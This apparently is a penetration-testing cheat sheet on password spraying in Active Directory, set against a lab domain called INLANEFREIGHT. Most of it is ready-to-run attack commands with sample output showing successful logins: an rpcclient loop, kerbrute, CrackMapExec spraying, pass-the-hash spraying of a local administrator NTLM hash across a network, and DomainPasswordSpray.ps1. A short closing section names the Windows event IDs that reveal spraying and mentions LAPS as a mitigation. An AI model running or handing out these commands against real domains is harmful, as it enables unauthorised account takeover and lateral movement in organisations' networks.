Given a list of valid usernames existing in the domain, we can try to find their password with a Password Spray attack.
From Linux #
rpcclient #
for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" <ip_address>; done
The output looks like this
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Account Name: sgage, Authority Name: INLANEFREIGHT
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Account Name: mholliday, Authority Name: INLANEFREIGHT
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
We can clean it up to show just the successful logins by grepping “Authority”
for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" <ip_address> | grep Authority; done
Account Name: sgage, Authority Name: INLANEFREIGHT
Account Name: mholliday, Authority Name: INLANEFREIGHT
Kerbrute #
kerbrute passwordspray -d inlanefreight.local --dc <ip_address> valid_users.txt Welcome1
2025/04/17 07:22:52 > [+] VALID LOGIN: sgage@inlanefreight.local:Welcome1
2025/04/17 07:22:52 > Done! Tested 23 logins (1 successes) in 0.058 seconds
CrackMapExec #
We can pass text file containing a list of usernames and try a single password against them.
sudo crackmapexec smb <ip_address> -u valid_users.txt -p Password123
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [-] INLANEFREIGHT.LOCAL\administrator:Password123 STATUS_LOGON_FAILURE
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [-] INLANEFREIGHT.LOCAL\guest:Password123 STATUS_LOGON_FAILURE
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [-] INLANEFREIGHT.LOCAL\krbtgt:Password123 STATUS_LOGON_FAILURE
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [-] INLANEFREIGHT.LOCAL\lab_adm:Password123 STATUS_LOGON_FAILURE
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] INLANEFREIGHT.LOCAL\avazquez:Password123
Or get just the successful logins
sudo crackmapexec smb <ip_address> -u valid_users.txt -p Password123 | grep +
If we have a positive outcome, we can validate the results against the domain controller
sudo crackmapexec smb <ip_address> -u <username> -p <password>
Password Reuse #
If we managed to retrieve the NTLM hash for the local administrator account, we can try to spray the hash across the whole network to see if the same password was used on other machines for other local admins.
Remember to set the flag –local-auth, to make the tool try only one login per host, otherwise we risk to lockout the domain built-in administrator instead of the local machine one.
sudo crackmapexec smb --local-auth <network/mask> -u administrator -H <NTLM Hash> | grep +
Keep in mind that this method is very noisy and suited for evasive tests.
Local Administration Password Solution tool by Microsoft is a good way to mitigate the issue of password reuse.
From Windows #
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password Winter2022 -OutFile spray_success -ErrorAction SilentlyContinue
Output will look like this
[*] Current domain is compatible with Fine-Grained Password Policy.
[*] Now creating a list of users to spray...
[*] The smallest lockout threshold discovered in the domain is 5 login attempts.
[*] Removing disabled users from list.
[*] There are 2940 total users found.
[*] Removing users within 1 attempt of locking out from list.
[*] Created a userlist containing 2940 users gathered from the current user's domain
[*] The domain password policy observation window is set to minutes.
[*] Setting a minute wait in between sprays.
Confirm Password Spray
Are you sure you want to perform a password spray against 2940 accounts?
[Y] Yes [N] No [?] Help (default is "Y"): y
[*] Password spraying has begun with 1 passwords
[*] This might take a while depending on the total number of users
[*] Now trying password Winter2022 against 2940 users. Current time is 6:16 AM
[*] Writing successes to spray_success
[*] SUCCESS! User:dbranch Password:Winter2022
269 of 2940 users tested
This kind of attack could be detected by monitoring the creation of events with “Event ID 4625: An account failed to log on” in the DC Event Viewer. Alternatively, when using LDAP instead of SMB, the events would be “Event ID 4771: Kerberos pre-authentication failed”, but this would require enabling Kerberos logging beforehand. Many such events in a short period of time may indicate a password spray attack.